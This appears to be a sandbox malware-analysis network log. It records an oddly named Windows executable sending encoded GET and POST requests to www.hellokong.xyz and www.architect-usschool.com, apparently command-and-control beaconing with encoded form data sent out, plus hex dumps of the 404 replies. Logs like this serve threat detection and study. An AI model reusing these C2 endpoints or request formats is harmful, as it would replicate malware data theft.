                                                      Jul 3, 2024 17:57:53.806934118 CEST346OUTGET /oui5/?OdjTHtuX=SBbMJInblZiNUqJtj2t3oAZeaf7w1Mr63FaPzYR5npk3jTg+edZF9NME4tF9tViJCHx7c4tSq6N/qcOwzg98IChDG2ekcZOWcYJRK2znKimA3GQ/fbvAwxxdlKlVh8HBUwdv3Sg=&Y6vp=3PLd8j HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.hellokong.xyz
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:57:54.429059982 CEST548INHTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:57:54 GMT
                                                      Server: Apache
                                                      Content-Length: 389
                                                      Connection: close
                                                      Content-Type: text/html; charset=utf-8
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      21192.168.2.649749217.160.0.84806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:57:59.470967054 CEST632OUTPOST /s24g/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 213
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.architect-usschool.com
                                                      Origin: http://www.architect-usschool.com
                                                      Referer: http://www.architect-usschool.com/s24g/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 31 70 67 46 4d 32 42 67 32 6f 53 6a 4c 6a 34 52 46 62 30 72 32 4d 6e 79 48 51 69 64 58 69 32 5a 6a 76 56 44 79 6e 4e 50 65 2b 52 50 59 78 44 5a 36 34 62 35 59 42 36 51 73 77 52 78 70 72 44 57 79 38 6c 50 4f 57 7a 2b 56 62 52 5a 32 30 41 62 38 4a 52 2b 52 79 45 4e 49 33 67 68 6c 37 57 56 2f 41 65 4a 6a 50 59 73 32 7a 38 73 53 69 44 35 6d 37 59 4e 44 64 54 6d 34 39 45 55 51 41 78 4a 45 4b 46 50 53 69 6e 34 5a 6a 33 33 54 56 2f 7a 4e 68 67 57 5a 65 47 72 37 4c 76 76 63 4d 66 2b 56 46 34 57 66 7a 4d 35 65 55 4e 71 59 4f 63 32 6b 43 69 52 71 2f 67 43 2f 51 74 6e 4d 33 51 36 33 5a 36 68 71 62 4e 53 4b 4f 39 50
                                                      Data Ascii: OdjTHtuX=1pgFM2Bg2oSjLj4RFb0r2MnyHQidXi2ZjvVDynNPe+RPYxDZ64b5YB6QswRxprDWy8lPOWz+VbRZ20Ab8JR+RyENI3ghl7WV/AeJjPYs2z8sSiD5m7YNDdTm49EUQAxJEKFPSin4Zj33TV/zNhgWZeGr7LvvcMf+VF4WfzM5eUNqYOc2kCiRq/gC/QtnM3Q63Z6hqbNSKO9P
                                                      Jul 3, 2024 17:58:00.511090040 CEST1236INHTTP/1.1 404 Not Found
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Date: Wed, 03 Jul 2024 15:58:00 GMT
                                                      Server: Apache
                                                      X-Powered-By: PHP/8.2.20
                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                      Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"
                                                      Content-Encoding: gzip
                                                      Data Raw: 35 34 30 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed bd 5b 97 db 46 b2 2e f8 2c ff 0a 98 5a 2d 57 6d 13 e0 9d ac 2a a9 d4 23 cb 72 6f cf b1 2c 1f 4b ee 9e 3d 96 17 17 48 82 55 90 48 82 0d 90 75 b1 5a 3f e6 3c 9e 87 f3 b0 d7 79 9b c7 f1 1f 9b 2f 22 32 13 09 30 41 b2 2e b2 bd d7 1a 5d aa 48 20 2f 91 91 91 71 cb c8 c8 27 9f 4f 92 f1 ea 7a 19 79 e7 ab f9 ec e9 67 4f e8 97 37 0b 17 67 a7 b5 68 e1 ff f4 ba 46 cf a2 70 f2 f4 b3 07 4f e6 d1 2a f4 c6 e7 61 9a 45 ab d3 da 4f 6f be f1 8f f0 fa 81 7a b1 08 e7 d1 69 ed 22 8e 2e 97 49 ba aa 79 e3 64 b1 8a 16 28 78 19 4f 56 e7 a7 93 e8 22 1e 47 3e 7f a9 7b f1 22 5e c5 e1 cc cf c6 e1 2c 3a 6d 51 33 4f 66 f1 e2 bd 97 46 b3 d3 da 32 4d a6 f1 2c aa 79 e7 69 34 3d ad 9d af 56 cb 93 46 e3 6c be 3c 0b 92 f4 ac 71 35 5d 34 5a 52 67 15 af 66 d1 d3 1f c2 b3 c8 5b 24 2b 6f 9a ac 17 13 ef d1 c3 a3 76 ab f5 d8 7b 96 8e cf e3 55 34 5e 61 1c 4f 1a 52 f4 33 19 05 03 fb 45 9a 8c 92 55 f6 85 01 f5 8b 45 12 2f 26 d1 55 1d 8d 4d 93 d9 2c b9 fc c2 6b 00 01 06 b2 2f 26 8b cc 5f 02 a8 68 [TRUNCATED]
                                                      Data Ascii: 5402[F.,Z-Wm*#ro,K=HUHuZ?<y/"20A.]H /q'OzygO7ghFpO*aEOozi".Iyd(xOV"G>{"^,:mQ3OfF2M,yi4=VFl<q5]4ZRgf[$+ov{U4^aOR3EUE/&UM,k/&_h5>BX(.yd_:YQVQW@Mi-\.g8\fW^NkPGiu&&%%,'nLQQ+x bxRXXEW"yO><g2^.y.~V,NQE?UvDVotm4zonoQdgk5~!5qT;Pl3^=oK?^gW";](=W1<<Zq~UE(EBbLdw.KY=z{*wzILMV|yr.apYeh*I1AR?_>V)/^?%sG}hXHj#A{v(>;_=F={=Xx1n
                                                      Jul 3, 2024 17:58:00.511113882 CEST224INData Raw: 75 4a 50 fe 14 2f 56 9d f6 b3 34 0d af 0f a2 e0 0c 30 11 79 00 f6 70 9f a6 83 09 0a 1e d6 d3 53 d4 bd 35 4c 0b 86 a9 7e 5f d0 1c 3e 4e a3 d5 3a 5d 78 ab 20 02 11 5c 1f 68 04 12 fa 0e 3f a8 97 d1 e9 e9 69 fa f3 ea 97 8f 87 39 82 d7 1a c1 d9 65 4c
                                                      Data Ascii: uJP/V40ypS5L~_>N:]x \h?i9eLG1(6gUqBQgiz5ofsp O@Fbuy44u'B_hD@=*51vQbmg}VU[tTzJOi>|S5
                                                      Jul 3, 2024 17:58:00.511131048 CEST1236INData Raw: 52 82 39 9a b6 f0 53 cf 07 21 97 67 02 4f e4 2d 8d 57 bf 35 63 a9 aa 28 68 75 55 3c fc a8 7a 6f e5 14 33 d5 14 43 0b 2a 3d ad 41 2e 47 d3 78 01 81 f4 f9 29 89 b3 64 ea fd 23 49 df 47 e9 df 66 c9 28 9c bd 1e 27 cb e8 d1 a3 2c 9a 4d a1 1b 80 57 2c
                                                      Data Ascii: R9S!gO-W5c(huU<zo3C*=A.Gx)d#IGf(',MW,"j:s^f5O\^""5Yzx~N:{=?\b4g'7?0r_!!_WV)i/`@ACCI!H?$?Gz&ExZ+pWA
                                                      Jul 3, 2024 17:58:00.511281967 CEST1236INData Raw: 64 dc 4b 98 13 60 82 50 a0 4e 85 07 68 76 51 66 11 01 38 51 30 0f 97 22 87 14 7b cc d9 cd 78 16 c2 a1 33 f6 a1 f0 cc 23 61 27 3b 64 d1 1e 5e 28 f7 88 3e 8c 93 59 92 9e 3c 9c 4e a7 8f 73 16 0f de c6 4f 3b ed ce a0 33 7e 2c c2 ca 07 97 8b d7 d9 c9
                                                      Data Ascii: dK`PNhvQf8Q0"{x3#a';d^(>Y<NsO;3~,1,)bI2?vC-#>/=~?jN<{LF'E9_|A=yD9zdr/X!OMYf|.Ppg>ht4_e0-43&p7z:
                                                      Jul 3, 2024 17:58:00.511296988 CEST1236INData Raw: 6d ce 21 87 65 de dc 35 41 a6 ff a6 96 00 b9 61 36 20 20 7e 90 43 40 df dc 65 ca ed 68 ee 63 3c a2 30 e4 d7 f3 45 56 60 24 86 1d 31 2f d8 a3 8a c5 9d dc 55 68 e3 cd c7 a8 e1 a3 5f 45 ee be 5a 10 5d 36 ef 33 10 56 d5 b5 3a d5 75 83 f3 30 13 07 81
                                                      Data Ascii: m!e5Aa6 ~C@ehc<0EV`$1/Uh_EZ]63V:u0x=3;gsjgs\E)hKdg{e;2R v>U\CR5G-p#-1{[hUD9SRvQR";OZ-?m9AM;*nDR$#
                                                      Jul 3, 2024 17:58:00.511313915 CEST672INData Raw: b5 0c 17 9a db 6c c1 56 45 5b 5b d7 5b b1 8e 47 59 3c 58 81 41 64 f7 32 41 0e 94 6d 78 28 d4 65 48 f3 da cb d9 35 50 51 f8 ce ac 6f 27 42 0a 83 b5 68 cc a4 31 11 d6 ad f4 2a c5 b3 ed 6d 62 f0 20 66 df 2e b1 01 ea 2e 00 1d 8c ae 49 fd 42 94 ca 79
                                                      Data Ascii: lVE[[[GY<XAd2Amx(eH5PQo'Bh1*mb f..IBy>4JV M=\r#mwo- )!f)A!Quo#"EZspU!"xV]Y!4M^A@QVRM-,4z$U9y_Hf5g;@/:)
                                                      Jul 3, 2024 17:58:00.511662006 CEST1236INData Raw: e4 ca a6 22 85 3b cc 11 73 cb fd 17 6b 3e 59 1c 11 ac 7d 54 1b a3 55 12 70 a7 0d 83 03 a9 29 ce ef ae c7 63 f8 4c 78 95 c8 13 5a 83 44 a7 37 30 6b a5 22 0e af 2d e0 cf e1 a6 04 aa bd 75 97 2d 13 b3 a9 53 10 70 a2 1e cb 92 11 2b 8b 43 3a 6e b0 4c
                                                      Data Ascii: ";sk>Y}TUp)cLxZD70k"-u-Sp+C:nL-wO8a8>j8R:$`8W2KZHB]{C92['7dy@Hk}_cSaSUeBH2-i:0HtHZ`_F;;
                                                      Jul 3, 2024 17:58:00.511676073 CEST1236INData Raw: b5 93 fb 18 be 05 5c d9 97 2c 4e 10 80 8c 03 28 ab e8 7e 48 8a 99 85 9a c9 7b 12 04 bb 67 ee f7 a1 4f 35 55 bf 6b 67 f7 25 4c 77 e3 f0 ee 3d 21 88 c6 27 03 ac a0 d5 ea 87 86 1b 87 bb 45 87 ad 15 4f 28 9a 03 37 1b e2 38 57 a1 dd db 5b 12 7f 4c ff
                                                      Data Ascii: \,N(~H{gO5Ukg%Lw=!'EO(78W[Ln-W$H#EcRvC>C}R23lAiuQ`r?!ULj#5LZ)O&SxIb!^aB9eJIN~O%N)p56\3:
                                                      Jul 3, 2024 17:58:00.511691093 CEST1236INData Raw: 75 57 2a 5d ab 9e e0 2e 21 6e b3 23 e5 fd c1 6d 25 f6 80 c2 13 95 03 64 e3 39 5b fa 7b 41 d7 1d f4 8f 47 1d 57 9f 5e 4c 0d 68 54 f0 fd 14 27 de 91 82 0f 33 f9 1c c9 4a e3 c4 a3 1c 3e 58 3c 88 da c0 7a c1 6c c8 8e 38 4f 69 30 46 e2 1c 4e 3d 42 27
                                                      Data Ascii: uW*].!n#m%d9[{AGW^LhT'3J>X<zl8Oi0FN=B')q}o3:*EU`];:VDmqokg?>W/_fxu$^FD&1!rL}~.9F:\.8Mh\q_XCU
                                                      Jul 3, 2024 17:58:00.512063026 CEST104INData Raw: 6e a3 2b 98 a9 4b e2 4e d6 4b 9a 78 d4 d2 2f 09 19 9b 56 30 e8 e7 d9 3b f8 ef 88 93 d0 e5 c1 2c b7 2c 56 92 83 06 67 1e 43 c6 82 d7 ea 46 c1 e0 ad 26 76 e7 1a 32 d2 d6 71 c4 17 fb 0e 38 63 61 72 7b 02 14 23 99 c8 73 63 af 6a 45 04 02 14 c9 65 46
                                                      Data Ascii: n+KNKx/V0;,,VgCF&v2q8car{#scjEeF@"Ti74CYhS
                                                      Jul 3, 2024 17:58:00.515985966 CEST1236INData Raw: 7a f0 40 6e f7 a1 91 e2 9e 65 f6 d8 e3 66 74 b6 ea 36 41 d0 13 84 ae c9 56 00 2d c2 f7 0f ab 1e f2 3d 45 46 73 06 cb 8d 1e cd 15 02 78 23 e8 3e 0f 54 90 fc 1d 4e fc 97 54 a0 7c de 4b 83 2d f2 a8 8d 65 c6 69 52 78 41 6f f0 8e 82 2f b3 a3 7c 99 36
                                                      Data Ascii: z@neft6AV-=EFsx#>TNT|K-eiRxAo/|6l;Ztg&\tG(-6Y{+K6>;RA;zn/fV8r=RRZ;/v 1!['3H9'{ZX"'`v,!'O`~&y/K


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      22192.168.2.649750217.160.0.84806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:58:02.010878086 CEST656OUTPOST /s24g/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 237
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.architect-usschool.com
                                                      Origin: http://www.architect-usschool.com
                                                      Referer: http://www.architect-usschool.com/s24g/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 31 70 67 46 4d 32 42 67 32 6f 53 6a 4b 44 49 52 48 36 30 72 33 73 6e 39 49 77 69 64 42 53 32 64 6a 76 5a 44 79 6c 67 55 65 4d 46 50 5a 54 4c 5a 35 35 62 35 56 68 36 51 6b 51 52 30 32 62 43 55 79 38 70 74 4f 54 4c 2b 56 66 78 5a 32 77 45 62 38 65 46 2f 51 69 45 50 43 6e 67 6a 36 72 57 56 2f 41 65 4a 6a 50 4d 4b 32 7a 45 73 53 52 62 35 6d 66 45 4f 41 64 54 70 76 4e 45 55 55 41 77 43 45 4b 46 70 53 6d 75 54 5a 6d 7a 33 54 55 50 7a 63 51 67 56 44 4f 48 69 6b 62 75 75 4d 65 6a 30 58 31 74 6f 65 41 6b 4a 4b 47 64 39 55 59 64 73 34 78 69 79 34 76 41 41 2f 53 31 56 4d 58 51 51 31 5a 43 68 34 4d 42 31 46 36 59 73 34 74 68 55 41 76 74 59 75 78 6d 41 69 35 34 39 71 6b 48 6a 34 77 3d 3d
                                                      Data Ascii: OdjTHtuX=1pgFM2Bg2oSjKDIRH60r3sn9IwidBS2djvZDylgUeMFPZTLZ55b5Vh6QkQR02bCUy8ptOTL+VfxZ2wEb8eF/QiEPCngj6rWV/AeJjPMK2zEsSRb5mfEOAdTpvNEUUAwCEKFpSmuTZmz3TUPzcQgVDOHikbuuMej0X1toeAkJKGd9UYds4xiy4vAA/S1VMXQQ1ZCh4MB1F6Ys4thUAvtYuxmAi549qkHj4w==
                                                      Jul 3, 2024 17:58:03.042216063 CEST1236INHTTP/1.1 404 Not Found
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Date: Wed, 03 Jul 2024 15:58:02 GMT
                                                      Server: Apache
                                                      X-Powered-By: PHP/8.2.20
                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                      Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"
                                                      Content-Encoding: gzip
                                                      Data Raw: 35 34 30 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed bd 5b 97 db 46 b2 2e f8 2c ff 0a 98 5a 2d 57 6d 13 e0 9d ac 2a a9 d4 23 cb 72 6f cf b1 2c 1f 4b ee 9e 3d 96 17 17 48 82 55 90 48 82 0d 90 75 b1 5a 3f e6 3c 9e 87 f3 b0 d7 79 9b c7 f1 1f 9b 2f 22 32 13 09 30 41 b2 2e b2 bd d7 1a 5d aa 48 20 2f 91 91 91 71 cb c8 c8 27 9f 4f 92 f1 ea 7a 19 79 e7 ab f9 ec e9 67 4f e8 97 37 0b 17 67 a7 b5 68 e1 ff f4 ba 46 cf a2 70 f2 f4 b3 07 4f e6 d1 2a f4 c6 e7 61 9a 45 ab d3 da 4f 6f be f1 8f f0 fa 81 7a b1 08 e7 d1 69 ed 22 8e 2e 97 49 ba aa 79 e3 64 b1 8a 16 28 78 19 4f 56 e7 a7 93 e8 22 1e 47 3e 7f a9 7b f1 22 5e c5 e1 cc cf c6 e1 2c 3a 6d 51 33 4f 66 f1 e2 bd 97 46 b3 d3 da 32 4d a6 f1 2c aa 79 e7 69 34 3d ad 9d af 56 cb 93 46 e3 6c be 3c 0b 92 f4 ac 71 35 5d 34 5a 52 67 15 af 66 d1 d3 1f c2 b3 c8 5b 24 2b 6f 9a ac 17 13 ef d1 c3 a3 76 ab f5 d8 7b 96 8e cf e3 55 34 5e 61 1c 4f 1a 52 f4 33 19 05 03 fb 45 9a 8c 92 55 f6 85 01 f5 8b 45 12 2f 26 d1 55 1d 8d 4d 93 d9 2c b9 fc c2 6b 00 01 06 b2 2f 26 8b cc 5f 02 a8 68 [TRUNCATED]
                                                      Data Ascii: 5402[F.,Z-Wm*#ro,K=HUHuZ?<y/"20A.]H /q'OzygO7ghFpO*aEOozi".Iyd(xOV"G>{"^,:mQ3OfF2M,yi4=VFl<q5]4ZRgf[$+ov{U4^aOR3EUE/&UM,k/&_h5>BX(.yd_:YQVQW@Mi-\.g8\fW^NkPGiu&&%%,'nLQQ+x bxRXXEW"yO><g2^.y.~V,NQE?UvDVotm4zonoQdgk5~!5qT;Pl3^=oK?^gW";](=W1<<Zq~UE(EBbLdw.KY=z{*wzILMV|yr.apYeh*I1AR?_>V)/^?%sG}hXHj#A{v(>;_=F={=Xx1n
                                                      Jul 3, 2024 17:58:03.042290926 CEST1236INData Raw: 75 4a 50 fe 14 2f 56 9d f6 b3 34 0d af 0f a2 e0 0c 30 11 79 00 f6 70 9f a6 83 09 0a 1e d6 d3 53 d4 bd 35 4c 0b 86 a9 7e 5f d0 1c 3e 4e a3 d5 3a 5d 78 ab 20 02 11 5c 1f 68 04 12 fa 0e 3f a8 97 d1 e9 e9 69 fa f3 ea 97 8f 87 39 82 d7 1a c1 d9 65 4c
                                                      Data Ascii: uJP/V40ypS5L~_>N:]x \h?i9eLG1(6gUqBQgiz5ofsp O@Fbuy44u'B_hD@=*51vQbmg}VU[tTzJOi>|S5R9S!gO-W
                                                      Jul 3, 2024 17:58:03.042314053 CEST1236INData Raw: c2 40 3f 12 a2 09 bf 05 37 80 a0 f7 3c 8a 56 5f 68 bc 8f 66 c9 f8 bd 3f 8b 47 69 98 5e 0b c6 d9 7b f1 85 f2 5e b8 cd 36 db 6a 6b 60 5a 1a c0 fa aa 51 68 4b ba 67 e3 0d 05 72 eb 6d 63 46 bd 79 34 89 c3 d3 2f b0 66 c4 01 91 d3 45 0a 96 97 c6 70 84
                                                      Data Ascii: @?7<V_hf?Gi^{^6jk`ZQhKgrmcFy4/fEp~)Fb>g)/Im"FM{yzJ!O<OQr|14?~>&58@i55?7>?nba^~J9*7dCOdK`PNhvQf8
                                                      Jul 3, 2024 17:58:03.042573929 CEST1236INData Raw: 8f d2 e8 20 88 33 10 17 45 54 f8 d3 59 74 75 f8 e1 2c 44 55 38 10 30 7b 8e 32 67 69 3c 29 96 21 0d d9 2b b4 92 5c 7a 4f bd 80 dd 4a b3 68 ba fa 30 9d 25 21 8c 38 fa fc 58 d9 75 ca c5 86 2d ab 94 cd bb e2 63 6c ce 80 84 08 80 ad 8d b3 71 a8 5b e7
                                                      Data Ascii: 3ETYtu,DU80{2gi<)!+\zOJh0%!8Xu-clq[/%GEU?m~^*32K)d(rqrHF C;~0v!&JN<xg+kx=Nh/ [X!`\~++2M?am!e5Aa6
                                                      Jul 3, 2024 17:58:03.042586088 CEST1236INData Raw: b9 ea 9a 10 be 0a 47 08 a3 a4 19 91 b9 81 13 96 72 30 e4 75 66 38 c9 94 2c 0a 2f 4d 3f 34 4d 74 98 c4 8d 30 6a 7e 44 47 62 c6 08 bd 1a e1 64 78 d5 ac a2 9c d5 8b 22 83 f1 3a 4d 89 a5 ca 1b 26 17 ab 10 c5 a0 12 9c 1a 94 7b 6a 9a d3 21 6c 69 6b 99
                                                      Data Ascii: Gr0uf8,/M?4Mt0j~DGbdx":M&{j!lik? @==Y`$"E@!{U>|cTE-Ub'Lrb[YI8{VlcEa'hWOB&[vpb8T+'ttlVE[[[GY<X
                                                      Jul 3, 2024 17:58:03.042597055 CEST1236INData Raw: 32 d2 7c a0 9b bf dd de cc 1e 7b 4b 70 4a 91 f7 7e 88 0c 08 11 ce 5f e7 53 f1 89 b6 cb ec ee ee 7b 50 f1 94 75 6f 9c 00 5a 71 4a 2a 7b 38 37 a6 2c d5 98 a6 24 bb ed fb 23 a2 f1 f9 6c 32 5c 9d cf 87 e3 e9 19 96 05 6f 67 58 73 b0 37 d0 6a 9b f2 3c
                                                      Data Ascii: 2|{KpJ~_S{PuoZqJ*{87,$#l2\ogXs7j<BJi^_m[w+pkhH -C=Scn@w\`&wM[@qkK_v+he+:CWKvw/cGZ^5kbY
                                                      Jul 3, 2024 17:58:03.042607069 CEST776INData Raw: b8 8f 1e 36 3b 47 8f d5 a4 9e 52 de 64 79 82 20 70 b9 65 f9 2e 7b 3e f9 7e a0 84 1a 50 b2 6e e4 15 6d de 69 73 c4 34 aa f7 5f 69 df 9b 73 47 84 97 11 a2 c0 22 de e9 a1 07 ea 7b 69 0b 1c 5b f7 f7 b4 c9 29 83 9a 86 3e 9f 0a fa 1d 06 c5 fd dc 6d 38
                                                      Data Ascii: 6;GRdy pe.{>~Pnmis4_isG"{i[)>m8w-pw[h1/7NpFxDn;^]!QhK]AFWT ijO{~WpyRHMLQC,R8uM;1kqM=S8?{1W?mMrN
                                                      Jul 3, 2024 17:58:03.042618036 CEST1236INData Raw: 8b c3 64 40 63 e6 4d 12 30 12 85 57 7e e6 f3 93 62 83 fa 32 45 85 49 69 e8 ab 64 f5 db ff 5e 78 93 c8 fb 26 1c 47 23 04 7f 78 18 21 36 6b c6 60 74 ba c9 f8 02 f1 04 d4 95 3f 1d a1 cd 07 7c d3 1e 5f 21 60 2e 0f f8 ec 01 b3 34 be c5 4f 21 fe 81 1a
                                                      Data Ascii: d@cM0W~b2EIid^x&G#x!6k`t?|_!`.4O!UTB43Qr`uW*].!n#m%d9[{AGW^LhT'3J>X<zl8Oi0FN=B')q}o3:*EU`];:V
                                                      Jul 3, 2024 17:58:03.043397903 CEST1236INData Raw: 74 e6 ad 7e fb 5f ab 35 6c 62 10 77 a1 67 e9 61 45 41 fe 94 46 88 61 a2 8c 11 92 56 88 ba b6 0c 36 1c b1 21 b7 91 e1 02 a3 58 d8 35 1b 6b 32 a6 68 15 e3 d8 3b 3c cf a2 19 5a 4c 1b ef b7 2e ab e2 1a 97 c4 bb 6a 32 35 8d 1e b5 e9 af 06 c0 b2 a9 b0
                                                      Data Ascii: t~_5lbwgaEAFaV6!X5k2h;<ZL.j25"i<RecM~_59G~xIG'kxn+KNKx/V0;,,VgCF&v2q8car{#scjEeF@"Ti74CYhSz@neft6A
                                                      Jul 3, 2024 17:58:03.043411016 CEST1236INData Raw: 85 40 88 ef 5e 3c fb f1 fb af 9f bd fe 77 26 58 92 48 33 04 26 86 de 57 3a 06 04 fe 14 22 6f b5 ef 91 67 c8 b4 6f 96 52 65 24 ef ae fe 42 c9 3f 20 f5 6f 58 83 f3 ed da 4d f8 08 e5 1a 93 0f ea 2c aa 83 87 4f ae bd 20 9a f9 e3 59 46 3e 28 c9 0f 4a
                                                      Data Ascii: @^<w&XH3&W:"ogoRe$B? oXM,O YF>(J8"g%5StqhPcnB#[g#H]7eAP%n^]Hwq3b7W(/BUXuJvMvJTRK!^a5..3S^bm!Lacc[0
                                                      Jul 3, 2024 17:58:03.047848940 CEST1236INData Raw: a0 d2 00 4b 2e 47 f4 57 b2 5a cd 1e 7d 2e 83 4b 75 b4 18 54 3a 89 36 77 65 4f 8d a2 7e 8d 52 c6 fa 9a 65 5b 17 b4 ac b2 c6 66 fc ea 45 ba 7d 6c 30 82 93 20 68 9c f7 84 8b 36 4c 19 3e 4d 52 16 33 db 28 b2 c9 59 37 8a 14 16 7c f5 60 b5 16 40 83 d5
                                                      Data Ascii: K.GWZ}.KuT:6weO~Re[fE}l0 h6L>MR3(Y7|`@k)fw-%5I>q;8'tD~_imNI{@smhRpsdn!]Dxm.|hqf<U}f8SC01Q>5v`HH{rRbGQ![JTX;-p


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      23192.168.2.649751217.160.0.84806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:58:04.577734947 CEST1669OUTPOST /s24g/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1249
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Host: www.architect-usschool.com
                                                      Origin: http://www.architect-usschool.com
                                                      Referer: http://www.architect-usschool.com/s24g/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Data Raw: 4f 64 6a 54 48 74 75 58 3d 31 70 67 46 4d 32 42 67 32 6f 53 6a 4b 44 49 52 48 36 30 72 33 73 6e 39 49 77 69 64 42 53 32 64 6a 76 5a 44 79 6c 67 55 65 4e 39 50 5a 67 54 5a 35 65 76 35 55 68 36 51 71 77 52 31 32 62 44 4d 79 38 42 70 4f 54 33 75 56 64 4a 5a 6b 46 51 62 72 2f 46 2f 65 53 45 50 4d 33 67 67 6c 37 58 56 2f 45 36 4e 6a 50 63 4b 32 7a 45 73 53 58 33 35 6b 4c 59 4f 4d 39 54 6d 34 39 45 59 51 41 77 71 45 4b 64 58 53 6d 71 6c 5a 79 48 33 54 30 66 7a 50 43 34 56 62 65 48 73 6e 62 76 39 4d 65 75 75 58 30 41 52 65 42 52 42 4b 47 35 39 57 4d 5a 31 67 79 4f 52 37 2b 34 47 34 43 6c 66 43 43 38 68 7a 4a 4b 4e 70 38 56 32 4e 75 41 6d 37 34 68 59 56 4f 55 62 37 67 47 43 69 75 64 66 76 30 65 71 6c 4c 68 6a 2b 79 42 4e 65 49 37 44 45 31 67 37 50 67 55 32 55 45 42 61 66 6f 38 4b 58 4f 4e 77 5a 35 79 74 7a 74 33 43 6f 43 41 57 6f 36 4c 30 2f 50 50 42 42 42 39 71 54 4b 47 30 6a 69 77 64 57 6e 2b 35 44 39 61 6a 51 31 53 7a 72 6e 46 76 42 6a 79 68 56 2b 56 31 5a 2f 45 4e 46 4c 33 62 6f 33 44 30 66 50 39 35 6e [TRUNCATED]
